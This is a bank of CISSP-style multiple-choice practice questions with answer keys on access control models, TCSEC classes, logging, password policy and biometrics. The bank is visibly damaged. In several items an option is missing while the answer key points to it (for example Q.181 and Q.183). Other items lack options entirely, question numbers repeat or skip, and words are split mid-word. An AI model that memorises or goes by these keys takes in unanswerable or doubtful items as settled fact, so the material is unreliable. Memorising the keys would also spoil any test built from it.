A#CISSP3 Q.158:  Which of the following is the lowest TCSEC class where in the sys tem must protected against covert storage channels (but not necessarily covert timing channels)?	^A: B2	^B: B1	^C: B3	^D: A1
C#CISSP3 Q.159:  Which type of control is concerned with avoiding occurrences of risks?  	^A: Deterrent controls	^B: Detective controls	^C: Preventive controls	^D: Compensating controls
A#CISSP3 Q.160:  The basic function of an FRDS is to?  	^A: Protect file servers from data loss and a loss of availability due to disk failure.	^B: Persistent file servers from data gain and a gain of availability due to disk failure.	^C: Prudent file servers from data loss and a loss of acceptability due to disk failure.	^D: Packet file servers from data loss and a loss of accountability due to disk failure.
D#CISSP3 Q.161:  Which of the following protocols does not operate at the data link layer (layer 2)?  	^A: PPP	^B: RARP	^C: L2F	^D: ICMP
A#CISSP3 Q.162:  This tape format can be used to backup data systems in addition to its original intended audio usedby:  	^A: Digital Audio tape (DAT)	^B: Digital video tape (DVT)	^C: Digital Casio Tape (DCT)	^D: Digital Voice Tape (DVT)
C#CISSP3 Q.163:  By examining the state and context of the incoming data packets, it helps to track the protocolsthat are considered connectionless, such as UDP-based applications and Remote Procedure Calls (RPC). This type of firewall system is used in?  	^A: First generation firewall systems.	^B: Second generation firewall systems.	^C: Third generation firewall systems.	^D: Fourth generation firewall systems.
A#CISSP3 Q.164:  Guards are appropriate whenever the function required by the security program involves which of the following?	^A: The use of discriminating judgment.^B: The use of physical force.	^C: The operation of access control devices.	^D: The need to detect unauthorized access.
A#CISSP3 Q.165:  A server cluster looks like a?  	^A: Single server from the users point of view.	^B: Dual server from the users point of view.	^C: Tripe server from the users point of view.	^D: Quardle server from the users point of view.
D#CISSP3 Q.166:  Which of the following are functions that are compatible in a properly segregated environment?	^A: Application programming and computer operation.	^B: System programming and job control analysis.	^C: Access authorization and database administration.	^D: System development and systems maintenance.
B#CISSP3 Q.167:  Encryption is applicable to all of the following OSI/ISO layers except:  	^A: Network la yer	^B: Physical layer	^C: Session layer	^D: Data link layer
A#CISSP3 Q.168:  The Computer Security Policy Model the Orange Book is based on is which of the following?  	^A: Bell-LaPadula	^B: Data Encryption Standard	^C: Kerberos	^D: Tempest
A#CISSP3 Q.169:  Which type of attack would a competitive intelligence attack best classify as?	^A: Business attack	^B: Intelligence attack	^C: Financial attack	^D: Grudge attack
C#CISSP3 Q.170:  Which of the following is responsible for the most security issues?  	^A: Outside espionage	^B: Hackers	^C: Personnel	^D: Equipment failure
A#CISSP3 Q.171:  Which of the following goals is NOT a goal of Problem Management?  	^A: To eliminate all problems.	^B: To reduce failures to a manageable level.	^C: To prevent the occurrence or re-occurrence of a problem.	^D: To mitigate the negative impact of problems on computing services and resources.
D#CISSP3 Q.172:  Examples of types of physical access controls include all except which of the following?  	^A: badges	^B: locks	^C: guards	^D: passwords
C#CISSP3 Q.173:  Which of the following statements pertaining to the (ISC)2 Code of Ethics is incorrect?	^A: All information systems security professionals who are certified by (ISC)2 recognize that such a certification is a privilege that must be both earned and maintained.	^B: All information systems security professionals who are certified by (ISC)2 shall provide diligent and competent service to principals.	^C: All information systems security professionals who are certified by (ISC)2 shall discourage such behavior as associating or preparing to associate with criminals or criminal behavior.	^D: All information systems security professionals who are certified by (ISC)2 shall promote the	understanding and acceptance of prudent information security measures.
C#CISSP3 Q.174:  Which DES modes can best be used for authentication?  	^A: Cipher Block Chaining and Electronic Code Book.	^B: Cipher Block Chaining and Output Feedback.	^C: Cipher Block Chaining and Cipher Feedback.	^D: Output Feedback and Electronic Code Book.
A#CISSP3 Q.175:  In the OSI / ISO model, at what layer are some of the SLIP, CSLIP, PPP control functions are provided?  	^A: Link	^B: Transport	^C: Presentation	^D: Application
B#CISSP3 Q.176:  Which of the following best describes the purpose of debugging programs?  	^A: To generate random data that can be used to test programs before implementing them	^B: To ensure that program coding flaws are detected and corrected.	^C: To protect, during the programming phase, valid changes from being overwritten by other changes.	^D: To compare source code versions before transferring to the test environment.
A#CISSP3 Q.177:  With RAID Level 5 the spare drives that replace the failed drives are usually hot swappable, meaning the can be replaced on the server while the?  	^A: System is up and running.	^B: System is down and running.		^D: System is centre and running.
A#CISSP3 Q.178:  What is the process that RAID Level 0 uses as it creates one large disk by using several disks?  	^A: Striping	^B: Mirroring		^D: Clustering
A#CISSP3 Q.179:  Which of the following is used to create and delete views and relations within tables?  	^A: SQL Data Definition Language	^B: SQL Data Manipulation Language		^D: SQL Data Identification Language
B#CISSP3 Q.180:  Which division of the Orange Book deals with discretionary protection (need-to-know)?  ^A: D	^B: C	^C: B		
C#CISSP3 Q.181:  The Diffie -Hellman algorithm is used for?  	^A: Encryption	^B: Digital signature		^D: Non-repudiation
A#CISSP3 Q.182:  Primary run when time and tape space permits, and is used for the system archive or baselined tape sets is the?  	^A: Full backup method.	^B: Incremental backup method.		^D: Tape backup method.
C#CISSP3 Q.183:  Which of the following teams should not be included in an organizations contingency plan?  	^A: Damage assessment team.	^B: Hardware salvage team.		^D: Legal affairs team.
D#CISSP4 Q.1:  In a discretionary mode, which of the following entities is authorized to grant information access to other people?  	^A: Manager	^B: Group leader	^C: Security manager	^D: User
B#CISSP4 Q.1:  Covert channel is a communication channel that can be used for:	^A: Hardening the system.	^B: Violating the security policy.	^C: Protecting the DMZ.	^D: Strengthening the security policy.
C#CISSP4 Q.2:  To ensure that integrity is attainted through the Clark and Wilson model, certain rules are needed. These rules are:	^A: Processing rules and enforcement rules.	^B: Integrity-bouncing rules.	^C: Certification rules and enforcement rules.	^D: Certification rules and general rules.
D#CISSP4 Q.3:  What was introduces for circumventing difficulties in classic approaches to computer security by limiting damages produces by malicious programs?  	^A: Integrity-preserving	^B: Ref Mon	^C: Integrity-monitoring	^D: Non-Interference
A#CISSP4 Q.4:  What is an indirect way to transmit information with no explicit reading of confidential information?  	^A: Covert channels	^B: Backdoor	^C: Timing channels	^D: Overt channels
B#CISSP4 Q.5:  Which of the following are the limitations of the BLP model?  	^A: No policies for changing access data control.	^B: All of the choices.	^C: Contains covert channels.	^D: Static in nature.
B#CISSP4 Q.6:  Which of the following are the two most well known access control models?  	^A: Lattice and Biba	^B: Bell LaPadula and Biba	^C: Bell LaPadula and Chinese war	^D: Bell LaPadula and Info Flow
A#CISSP4 Q.7:  What can be defined as a formal security model for the integrity of subjects and objects in a system?  	^A: Biba	^B: Bell LaPadulaLattice	^C: Lattice	^D: Info Flow
D#CISSP4 Q.8:  Which of the following is best known for capturing security requirements of commercial applications?  	^A: Lattice	^B: Biba	^C: Bell LaPadula	^D: Clark and Wilson
B#CISSP4 Q.9:  The Clark Wilson model has its emphasis on:  	^A: Security	^B: Integrity	^C: Accountability	^D: Confidentiality
B#CISSP4 Q.10:  Which of the following is a state machine model capturing confidentiality aspects of access control?  	^A: Clarke Wilson	^B: Bell-LaPadula	^C: Chinese Wall	^D: Lattice
C#CISSP4 Q.11:  With the BLP model, access permissions are defined through:  	^A: Filter rules	^B: Security labels	^C: Access Control matrix	^D: Profiles
B#CISSP4 Q.12:  With the BLP model, security policies prevent information flowing downwards from a:  	^A: Low security level	^B: High security level	^C: Medium security level	^D: Neutral security level
D#CISSP4 Q.13:  When will BLP consider the information flow that occurs?  	^A: When a subject alters on object.	^B: When a subject accesses an object.	^C: When a subject observer an object.	^D: All of the choices.
C#CISSP4 Q.14:  Separation of duties is valuable in deterring:  	^A: DoS	^B: external intruder	^C: fraud	^D: trojan house
C#CISSP4 Q.15:  What principle requires that for particular sets of transactions, no single individual be allowed to execute all transactions within the set?  	^A: Use of rights	^B: Balance of power	^C: Separation of duties	^D: Fair use
D#CISSP4 Q.16:  Separation of duty can be:  	^A: Dynamic only	^B: Encrypted	^C: Static only	^D: Static or dynamic
A#CISSP4 Q.17:  Who should determine the appropriate sensitivity classifications of information?  	^A: Owner	^B: Server	^C: Administrator	^D: User
A#CISSP4 Q.18:  Who should determine the appropriate access control of information?  	^A: Owner	^B: User	^C: Administrator	^D: Server
D#CISSP4 Q.19:  What principle requires that a user be given no more privilege then necessary to perform a job?  	^A: Principle of aggregate privilege.	^B: Principle of most privilege.	^C: Principle of effective privilege.	^D: Principle of least privilege.
B#CISSP4 Q.20:  To ensure least privilege requires that __________ is identified.  	^A: what the users privilege owns	^B: what the users job is	^C: what the users cost is	^D: what the users group is
B#CISSP4 Q.21:  The concept of least privilege currently exists within the context of:  	^A: ISO	^B: TCSEC	^C: OSI	^D: IEFT
B#CISSP4 Q.22:  Enforcing minimum privileges for general system users can be easily achieved through the use of:  	^A: TSTEC	^B: RBAC	^C: TBAC	^D: IPSEC
B#CISSP4 Q.23:  Which of the following are potential firewall problems that should be logged?  	^A: Reboot	^B: All of the choices.	^C: Proxies restarted.	^D: Changes to configuration file.
A#CISSP4 Q.24:  Which of the following are security events on Unix that should be logged?  	^A: All of the choices.	^B: Use of Setgid.	^C: Change of permissions on system files.	^D: Use of Setuid.
B#CISSP4 Q.25:  What process determines who is trusted for a given purpose?  	^A: Identification	^B: Authorization	^C: Authentication	^D: Accounting
B#CISSP4 Q.26:  Which of the following tools can you use to assess your networks vulnerability?  	^A: ISS	^B: All of the choices.	^C: SATAN	^D: Ballista
D#CISSP4 Q.27:  Which of the following should NOT be logged for performance problems?  	^A: CPU load.	^B: Percentage of use.	^C: Percentage of idle time.	^D: None of the choices.
A#CISSP4 Q.28:  Which of the following should be logged for security problems?  	^A: Use of mount command.	^B: Percentage of idle time.	^C: Percentage of use.	^D: None of the choices.
B#CISSP4 Q.29:  Which of the following services should be logged for security purpose?  	^A: bootp	^B: All of the choices.	^C: sunrpc	^D: tftp
D#CISSP4 Q.30:  Who should NOT have access to the log files?  	^A: Security staff.	^B: Internal audit staff.	^C: System administration staff.	^D: Managers secretary.
C#CISSP4 Q.31:  Which of the following correctly describe the use of the collected logs?  	^A: They are used in the passive monitoring process only.	^B: They are used in the active monitoring process only.	^C: They are used in the active and passive monitoring process.	^D: They are used in the archiving process only.
C#CISSP4 Q.32:  All logs are kept on archive for a period of time. What determines this period of time?  	^A: Administrator preferences.	^B: MTTR	^C: Retention polices	^D: MTTF
C#CISSP4 Q.33:  Logs must be secured to prevent:  	^A: Creation, modification, and destruction.	^B: Modification, deletion, and initialization.	^C: Modification, deletion, and destruction.	^D: Modification, deletion, and inspection.
A#CISSP4 Q.34:  To ensure dependable and secure logging, all computers must have their clock synchronized to:  	^A: A central timeserver.	^B: The log time stamp.	^C: The respective local times.	^D: None of the choices.
B#CISSP4 Q.35:  To ensure dependable and secure logging, logging information traveling on the network should be:  	^A: Stored	^B: Encrypted	^C: Isolated	^D: Monitored
A#CISSP4 Q.36:  The activity that consists of collecting information that will be used for monitoring is called:  	^A: Logging	^B: Troubleshooting	^C: Auditing	^D: Inspecting
B#CISSP4 Q.37:  How often should logging be run?  	^A: Once every week.	^B: Always	^C: Once a day.	^D: During maintenance.
A#CISSP4 Q.38:  If the computer system being used contains confidential information, users must not:  	^A: Leave their computer without first logging off.	^B: Share their desks.	^C: Encrypt their passwords.	^D: Communicate
A#CISSP4 Q.39:  Security is a process that is:  	^A: Continuous	^B: Indicative	^C: Examined	^D: Abnormal
C#CISSP4 Q.40:  Which of the following user items can be shared?  	^A: Password	^B: Home directory	^C: None of the choices.
B#CISSP4 Q.41:  Root login should only be allowed via:	^A: Rsh	^B: System console	^C: Remote program	^D: VNC
B#CISSP4 Q.42:  What should you do to the user accounts as soon as employment is terminated?  	^A: Disable the user accounts and erase immediately the data kept.	^B: Disable the user accounts and have the data kept for a specific period of time.	^C: None of the choices.	^D: Maintain the user accounts and have the data kept for a specific period of time.
D#CISSP4 Q.43:  Access to the _________ account on a Unix server must be limited to only the system administrators that must absolutely have this level of access.  	^A: Superuser of inetd.	^B: Manager or root.	^C: Fsf or root	^D: Superuser or root.
D#CISSP4 Q.44:  Which of the following correctly describe good security practice?  	^A: Accounts should be monitored regularly.	^B: You should have a procedure in place to verify password strength.	^C: You should ensure that there are no accounts without passwords.	^D: All of the choices.
A#CISSP4 Q.45:  LOMAC is a security enhancement for what operating system?  	^A: Linux	^B: Netware	^C: Solaris
B#CISSP4 Q.46:  LOMAC uses what Access Control method to protect the integrity of processes and data?  	^A: Linux based EFS.	^B: Low Water-Mark Mandatory Access Control.	^C: Linux based NFS.	^D: High Water-Mark Mandatory Access Control.
D#CISSP4 Q.47:  On Linux, LOMAC is implemented as:  	^A: Virtual addresses	^B: Registers	^C: Kernel built in functions	^D: Loadable kernel module
B#CISSP4 Q.49:  What is the me thod of coordinating access to resources based on the listening of permitted IP addresses?  	^A: MAC	^B: ACL	^C: DAC	^D: None of the choices.
A#CISSP4 Q.50:  With RBAC, each user can be assigned:  	^A: One or more roles.	^B: Only one role.	^C: A token role.	^D: A security token.
C#CISSP4 Q.51:  With RBAC, roles are:  	^A: Based on labels.	^B: All equal	^C: Hierarchical	^D: Based on flows.
C#CISSP4 Q.52:  With __________, access decisions are based on the roles that individual users have as part of an organization.  	^A: Server based access control.	^B: Rule based access control.	^C: Role based access control.	^D: Token based access control.
C#CISSP4 Q.53:  Under Role based access control, access rights are grouped by:  	^A: Policy name	^B: Rules	^C: Role name	^D: Sensitivity label
C#CISSP4 Q.54:  Which of the following will you consider as a role under a role based access control system?  	^A: Bank rules	^B: Bank computer	^C: Bank teller	^D: Bank network
B#CISSP4 Q.55:  Role based access control is attracting increasing attention particularly for what applications?  	^A: Scientific	^B: Commercial	^C: Security	^D: Technical
D#CISSP4 Q.56:  What is one advantage of deploying Role based access control in large networked applications?  	^A: Higher security	^B: Higher bandwidth	^C: User friendliness	^D: Lower cost
B#CISSP4 Q.57:  DAC and MAC policies can be effectively replaced by:  	^A: Rule based access control.	^B: Role based access control.	^C: Server based access control.	^D: Token based access control
B#CISSP4 Q.58:  Which of the following correctly describe Role based access control?	^A: It allows you to specify and enforce enterprise-specific security policies in a way that maps to your user profile groups.	^B: It allows you to specify and enforce enterprise-specific security policies in a way that maps to your organizations structure.	^C: It allows you to specify and enforce enterprise-specific security policies in a way that maps to your ticketing system.	^D: It allows you to specify and enforce enterprise-specific security policies in a way that maps to your ACL.
D#CISSP4 Q.59:  Which of the following RFC talks about Rule Based Security Policy?  	^A: 1316	^B: 1989	^C: 2717	^D: 2828
A#CISSP4 Q.60:  With Rule Based Security Policy, a security policy is based on:  	^A: Global rules imposed for all users.	^B: Local rules imposed for some users.	^C: Global rules imposed for no body.	^D: Global rules imposed for only the local users.
C#CISSP4 Q.61:  With Rule Based Security Policy, global rules usually rely on comparison of the _______ of the resource being accesseD.  	^A: A group of users.	^B: Users	^C: Sensitivity	^D: Entities
C#CISSP4 Q.62:  What control is based on a specific profile for each user?  	^A: Lattice based access control.	^B: Directory based access control.	^C: Rule based access control.	^D: ID based access control.
A#CISSP4 Q.63:  In a very large environment, which of the following is an administrative burden?  	^A: Rule based access control.	^B: Directory based access control.	^C: Lattice based access control	^D: ID bases access control
A#CISSP4 Q.64:  Which of the following is a feature of the Rule based access control?  	^A: The use of profile.	^B: The use of information flow label.	^C: The use of data flow diagram.	^D: The use of token.
D#CISSP4 Q.65:  A firewall can be classified as a:  	^A: Directory based access control.	^B: Rule based access control.	^C: Lattice based access control.	^D: ID based access control.
C#CISSP4 Q.66:  The Lattice Based Access Control model was developed MAINLY to deal with:  	^A: Affinity	^B: None of the choices.	^C: Confidentiality	^D: Integrity
B#CISSP4 Q.67:  With the Lattice Based Access Control model, a security class is also called a:  	^A: Control factor	^B: Security label	^C: Mandatory number	^D: Serial ID
A#CISSP4 Q.68:  Under the Lattice Based Access Control model, a container of information is a(n):  	^A: Object	^B: Model	^C: Label
A#CISSP4 Q.69:  What Access Control model was developed to deal mainly with information flow in computer systems?  	^A: Lattice Based	^B: Integrity Based	^C: Flow Based	^D: Area Based
B#CISSP4 Q.70:  The Lattice Based Access Control model was developed to deal mainly with ___________ in computer systems.  	^A: Access control	^B: Information flow	^C: Message routes	^D: Encryption
B#CISSP4 Q.71:  In the Lattice Based Access Control model, controls are applied to:  	^A: Scripts	^B: Objects	^C: Models	^D: Factors
C#CISSP4 Q.72:  With Discretionary access controls, who determines who has access and what privilege they have?  	^A: End users.	^B: None of the choices.	^C: Resource owners.	^D: Only the administrators.
A#CISSP4 Q.73:  What defines an imposed access control level?  	^A: MAC	^B: DAC	^C: SAC	^D: CAC
B#CISSP4 Q.74:  Under MAC, who can change the category of a resource?  	^A: All users.	^B: Administrators only.	^C: All managers.	^D: None of the choices.
A#CISSP4 Q.75:  Under MAC, who may grant a right of access that is explicitly forbidden in the access control policy?  	^A: None of the choices.	^B: All users.	^C: Administrators only.	^D: All managers.
B#CISSP4 Q.76:  You may describe MAC as:  	^A: Opportunistic	^B: Prohibitive	^C: None of the choices.	^D: Permissive
B#CISSP4 Q.77:  Under MAC, which of the following is true?  	^A: All that is expressly permitted is forbidden.	^B: All that is not expressly permitted is forbidden.	^C: All that is not expressly permitted is not forbidden.	^D: None of the choices.
C#CISSP4 Q.78:  Under MAC, a clearance is a:  	^A: Sensitivity	^B: Subject	^C: Privilege	^D: Object
D#CISSP4 Q.79:  Under MAC, a file is a(n):  	^A: Privilege	^B: Subject	^C: Sensitivity	^D: Object
A#CISSP4 Q.80:  Under MAC, classification reflects:  	^A: Sensitivity	^B: Subject	^C: Privilege	^D: Object
A#CISSP4 Q.81:  MAC is used for:  	^A: Defining imposed access control level.	^B: Defining user preferences.	^C: None of the choices.	^D: Defining discretionary access control level.
C#CISSP4 Q.82:  With MAC, who may make decisions that bear on policy?  	^A: None of the choices.	^B: All users.	^C: Only the administrator.	^D: All users except guests.
A#CISSP4 Q.83:  With MAC, who may NOT make decisions that derive from policy?  	^A: All users except the administrator.	^B: The administrator.	^C: The power users.	^D: The guests.
B#CISSP4 Q.84:  Under the MAC control system, what is required?  	^A: Performance monitoring	^B: Labelling	^C: Sensing	^D: None of the choices
C#CISSP4 Q.85:  Access controls that are not based on the policy are characterized as:  	^A: Secret controls	^B: Mandatory controls	^C: Discretionary controls	^D: Corrective controls
A#CISSP4 Q.86:  DAC are characterized by many organizations as:  	^A: Need-to-know controls	^B: Preventive controls	^C: Mandatory adjustable controls	^D: None of the choices
C#CISSP4 Q.87:  Which of the following correctly describe DAC?  	^A: It is the most secure method.	^B: It is of the B2 class.	^C: It can extend beyond limiting which subjects can gain what type of access to which objects.	^D: It is of the B1 class.
B#CISSP4 Q.88:  Under DAC, a subjects rights must be ________ when it leaves an organization altogether.  	^A: recycled	^B: terminated	^C: suspended	^D: resumed
B#CISSP4 Q.89:  Audit trail is a category of what control?  	^A: System, Manual	^B: Detective, Technical	^C: User, Technical	^D: Detective, Manual
B#CISSP4 Q.90:  IDS is a category of what control?  	^A: Detective, Manual	^B: Detective, Technical	^C: User, Technical	^D: System, Manual
D#CISSP4 Q.91:  Which of the following is not a detective technical control?  	^A: Intrusion detection system	^B: Violation reports	^C: Honeypot	^D: None of the choices.
D#CISSP4 Q.92:  ________ Technical Controls warn of technical Access Control violations.	^A: Elusive	^B: Descriptive	^C: Corrective	^D: Detective
D#CISSP4 Q.93:  A two factor authentication method is considered as a:  	^A: Technical control	^B: Patching control	^C: Corrective control	^D: Logical control
B#CISSP4 Q.94:  Which of the following will you NOT consider as technical controls?  	^A: Access Control software	^B: Man trap	^C: Passwords	^D: Antivirus Software
D#CISSP4 Q.95:  ___________________ are the technical ways of restricting who or what can access system resources.  	^A: Preventive Manual Controls	^B: Detective Technical Controls	^C: Preventive Circuit Controls	^D: Preventive Technical Controls
B#CISSP4 Q.96:  Preventive Technical Controls is usually built:  	^A: By using MD5.	^B: Into an operating system.	^C: By security officer.	^D: By security administrator.
D#CISSP4 Q.97:  Preventive Technical Controls cannot:  	^A: Protect the OS from unauthorized modification.	^B: Protect confidential information from being disclosed to unauthorized persons.	^C: Protect the OS from unauthorized manipulation.	^D: Protect users from being monitored.
D#CISSP4 Q.98:  How do Preventive Technical Controls protect system integrity and availability?  	^A: By limiting the number of threads only.	^B: By limiting the number of system variables.	^C: By limiting the number of function calls only.	^D: By limiting the number of users and/or processes.
C#CISSP4 Q.99:  Sensor is:  	^A: Logical, Physical	^B: Corrective, Logical	^C: Detective, Physical	^D: Corrective, Physical
D#CISSP4 Q.100:  Motion detector is a feature of:  	^A: Corrective Logical Controls.	^B: Logical Physical Controls.	^C: Corrective Physical Controls.	^D: Detective Physical Controls.
A#CISSP4 Q.101:  Closed circuit TV is a feature of:  	^A: Detective Physical Controls	^B: Corrective Physical Controls	^C: Corrective Logical Controls	^D: Logical Physical Controls
B#CISSP4 Q.102:  Access control is the collection of mechanisms that permits managers of a system to exercise influence over the use of:	^A: A man guard	^B: An IS system	^C: A threshold	^D: A Trap
B#CISSP4 Q.103:  Access control allows you to exercise directing influence over which of the following aspects of a system?  	^A: Behavior, user, and content provider.	^B: Behavior, use, and content.	^C: User logs and content.	^D: None of the choic es.
B#CISSP4 Q.104:  The principle of accountability is a principle by which specific action cab be traced back to:  	^A: A policy	^B: An individual	^C: A group	^D: A manager
C#CISSP4 Q.105:  The principle of _________ s a principle by which specific action can be traced back to anyone of your users.  	^A: Security	^B: Integrity	^C: Accountability	^D: Policy
D#CISSP4 Q.106:  According to the principle of accountability, what action should be traceable to a specific user?  	^A: Material	^B: Intangible	^C: Tangible	^D: Significant
C#CISSP4 Q.107:  A significant action has a state that enables actions on an ADP system to be traced to individuals who may then be held responsible. The action do NOT include:   ^A: Violations of security policy.	^B: Attempted violations of security policy.	^C: Non-violations of security policy.	^D: Attempted violations of allowed actions.
A#CISSP4 Q.108:  ____________ is the means by which the ability to do something with a computer resource is explicitly enabled or restricted.	^A: Access control	^B: Type of access	^C: System resource	^D: Work permit
A#CISSP4 Q.109:  The ability to do something with a computer resource can be explicitly enabled or restricted through:  	^A: Physical and system-based controls.	^B: Theoretical and system-based controls.	^C: Mental and system-based controls.	^D: Physical and trap-based controls.
C#CISSP4 Q.110:  The main categories of access control do NOT include:	^A: Administrative Access Control	^B: Logical Access Control	^C: Random Access Control	^D: Physical Access Control
D#CISSP4 Q.111:  You have very strict Physical Access controls. At the same time you have loose Logical Access Controls. What is true about this setting?  	^A: None of the choices.	^B: It can 100% secure your environment.	^C: It may secure your environment.	^D: It may not secure your environment.
A#CISSP4 Q.112:  Which of the following is NOT a type of access control?  	^A: Intrusive	^B: Deterrent	^C: Detective	^D: Preventive
A#CISSP4 Q.113:  As a type of access control, which of the following asks for avoiding occurrence?  	^A: Preventive	^B: Deterrent	^C: Intrusive	^D: Detective
C#CISSP4 Q.114:  As a type of access control, which of the following asks for identifying occurrences?  	^A: Deterrent	^B: Preventive	^C: Detective	^D: Intrusive
C#CISSP4 Q.115:  As a type of access control, which of the following asks for discouraging occurrence?  	^A: Detective	^B: Intrusive	^C: Deterrent	^D: Preventive
C#CISSP4 Q.116:  As a type of access control, which of the following asks for restoring controls?  	^A: Deterrent	^B: Intrusive	^C: Corrective	^D: Preventive
A#CISSP4 Q.117:  What type of access control focuses on restoring resources?  	^A: Recovery	^B: Preventive	^C: Intrusive	^D: Corrective
C#CISSP4 Q.118:  What scheme includes the requirement that the system maintain the separation of duty requirement expressed in the access control triples?  	^A: Bella	^B: Lattice	^C: Clark-Wilson	^D: Bell-LaPadula
B#CISSP4 Q.119:  What is an access control model?  	^A: A formal description of access control ID specification.	^B: A formal description of security policy.	^C: A formal description of a sensibility label.	^D: None of the choices.
B#CISSP4 Q.120:  Which of the following is true about MAC?  	^A: It is more flexible than DAC.	^B: It is more secure than DAC.	^C: It is less secure than DAC.	^D: It is more scalable than DAC.
C#CISSP4 Q.121:  The access matrix model consists of which of the following parts? (Choose all that apply)  	^A: A function that returns an objects type.	^B: A list of subjects.	^C: All of the choices.	^D: A list of objects.
A#CISSP4 Q.122:  The access matrix model has which of the following common implementations?  	^A: Access control lists and capabilities.	^B: Access control lists.	^C: Capabilities.	^D: Access control list and availability.
B#CISSP4 Q.123:  What can be accomplished by storing on each subject a list of rights the subject has for every object?  	^A: Object	^B: Capabilities	^C: Key ring	^D: Rights
B#CISSP4 Q.124:  Which of the following is true regarding a secure access model?  	^A: Secure information cannot flow to a more secure user.	^B: Secure information cannot flow to a less secure user.	^C: Secure information can flow to a less secure user.	^D: None of the choices.
A#CISSP4 Q.125:  In the Information Flow Model, what relates two versions of the same object?  	^A: Flow	^B: State	^C: Transformation	^D: Successive points
D#CISSP4 Q.126:  In the Information Flow Model, what acts as a type of dependency?  	^A: State	^B: Successive points	^C: Transformation	^D: Flow
C#CISSP4 Q.127:  The lattice-based model aims at protecting against:  	^A: Illegal attributes.	^B: None of the choices.	^C: Illegal information flow among the entities.	^D: Illegal access rights
B#CISSP4 Q.128:  Which of the following are the components of the Chinese wall model?  	^A: Conflict if interest classes.	^B: All of the choices.	^C: Subject	^D: Company Datasets.
B#CISSP4 Q.129:  Which of the following correctly describe the difference between identification and authentication?  	^A: Authentication is a means to verify who you are, while identification is what you are authorized to perform.	^B: Identification is a means to verify who you are, while authentication is what you are authorized to perform.	^C: Identification is another name of authentication.	^D: Identification is the child process of authentication.
B#CISSP4 Q.130:  Identification establishes:  	^A: Authentication	^B: Accountability	^C: Authorization	^D: None of the choices.
A#CISSP4 Q.131:  Identification usually takes the form of:  	^A: Login ID.	^B: User password.	^C: None of the choices.	^D: Passphrase
D#CISSP4 Q.132:  Authentication is typically based upon:  	^A: Something you have.	^B: Something you know.	^C: Something you are.	^D: All of the choices.
B#CISSP4 Q.133:  A password represents:  	^A: Something you have.	^B: Something you know.	^C: All of the choices.	^D: Something you are.
C#CISSP4 Q.134:  A smart card represents:  	^A: Something you are.	^B: Something you know.	^C: Something you have.	^D: All of the choices.
A#CISSP4 Q.135:  Retinal scans check for:  	^A: Something you are.	^B: Something you have.	^C: Something you know.	^D: All of the choices.
D#CISSP4 Q.136:  Which of the following is the most commonly used check on something you know?  	^A: One time password	^B: Login phrase	^C: Retinal	^D: Password
A#CISSP4 Q.137:  Software generated password has what drawback?  	^A: Password not easy to remember.	^B: Password too secure.	^C: None of the choices.	^D: Password unbreakable.
B#CISSP4 Q.138:  Which of the following will you consider as most secure?  	^A: Password	^B: One time password	^C: Login phrase	^D: Login ID
C#CISSP4 Q.139:  What type of password makes use of two totally unrelated words?  	^A: Login phrase	^B: One time password	^C: Composition	^D: Login ID
D#CISSP4 Q.140:  Which of the following are the advantages of using passphrase?  	^A: Difficult to crack using brute force.	^B: Offers numerous characters.	^C: Easier to remember.	^D: All of the choices.
B#CISSP4 Q.141:  Which of the following is the correct account policy you should follow?  	^A: All of the choices.	^B: All active accounts must have a password.	^C: All active accounts must have a long and complex pass phrase.	^D: All inactive accounts must have a password.
B#CISSP4 Q.142:  On UNIX systems, passwords shall be kept:  	^A: In any location on behalf of root.	^B: In a shadow password file.	^C: In the /etc/passwd file.	^D: In root.
B#CISSP4 Q.143:  Which of the following are the correct guidelines of password deployment?  	^A: Passwords must be masked.	^B: All of the choices.	^C: Password must have a minimum of 8 characters.	^D: Password must contain a mix of both alphabetic and non-alphabetic characters.
A#CISSP4 Q.144:  Why would a 16 characters password not desirable?  	^A: Hard to remember	^B: Offers numerous characters.	^C: Difficult to crack using brute force.	^D: All of the choices.
C#CISSP4 Q.145:  Which of the following is NOT a good password deployment guideline?  	^A: Passwords must not be he same as user id or login id.	^B: Password aging must be enforced on all systems.	^C: Password must be easy to memorize.	^D: Passwords must be changed at least once every 60 days, depending on your environment.
B#CISSP4 Q.146:  Routing password can be restricted by the use of:  	^A: Password age	^B: Password history	^C: Complex password	^D: All of the choices
A#CISSP4 Q.147:  Which of the following is an effective measure against a certain type of brute force password attack? ^A: Password used must not be a word found in a dictionary.	^B: Password history is used.	^C: Password reuse is not allowed.	^D: None of the choices.
D#CISSP4 Q.148:  Which of the following are measures against password sniffing?  	^A: Passwords must not be sent through email in plain text.	^B: Passwords must not be stored in plain text on any electronic media.	^C: You may store passwords electronically if it is encrypted.	^D: All of the choices.
B#CISSP4 Q.149:  What should you do immediately if the root password is compromised?  	^A: Change the root password.	^B: Change all passwords.	^C: Increase the value of password age.	^D: Decrease the value of password history.
B#CISSP4 Q.150:  Which of the following is the most secure way to distribute password?  	^A: Employees must send in an email before obtaining a password.	^B: Employees must show ip in person and present proper identification before obtaining a password.	^C: Employees must send in a signed email before obtaining a password.	^D: None of the choices.
C#CISSP4 Q.151:  Which of the following can be used to protect your system against brute force password attack?  	^A: Decrease the value of password history.	^B: Employees must send in a signed email before obtaining a password.	^C: After three unsuccessful attempts to enter a password, the account will be locked.	^D: Increase the value of password age.
C#CISSP4 Q.152:  You should keep audit trail on which of the following items?  	^A: Password usage.	^B: All unsuccessful logon.	^C: All of the choices.	^D: All successful logon.
D#CISSP4 Q.153:  What type of authentication takes advantage of an individuals unique physical characteristics in order to authenticate that persons identity?  	^A: Password	^B: Token	^C: Ticket Granting	^D: Biometric
A#CISSP4 Q.154:  Which of the following will you consider as the MOST secure way of authentication?  	^A: Biometric	^B: Password	^C: Token	^D: Ticket Granting
A#CISSP4 Q.155:  Biometric performance is most commonly measured in terms of:  	^A: FRR and FAR	^B: FAC and ERR	^C: IER and FAR	^D: FRR and GIC
B#CISSP4 Q.156:  What is known as the probability that you are not authenticated to access your account?  	^A: ERR	^B: FRR	^C: MTBF	^D: FAR
B#CISSP4 Q.157:  What is known as the chance that someone other than you is granted access to your account?  	^A: ERR	^B: FAR	^C: FRR	^D: MTBF
A#CISSP4 Q.158:  You are comparing biometric systems. Security is the top priority. A low ________ is most important in this regard.  	^A: FAR	^B: FRR	^C: MTBF	^D: ERR
D#CISSP4 Q.159:  The quality of finger prints is crucial to maintain the necessary:  	^A: FRR	^B: ERR and FAR	^C: FAR	^D: FRR and FAR
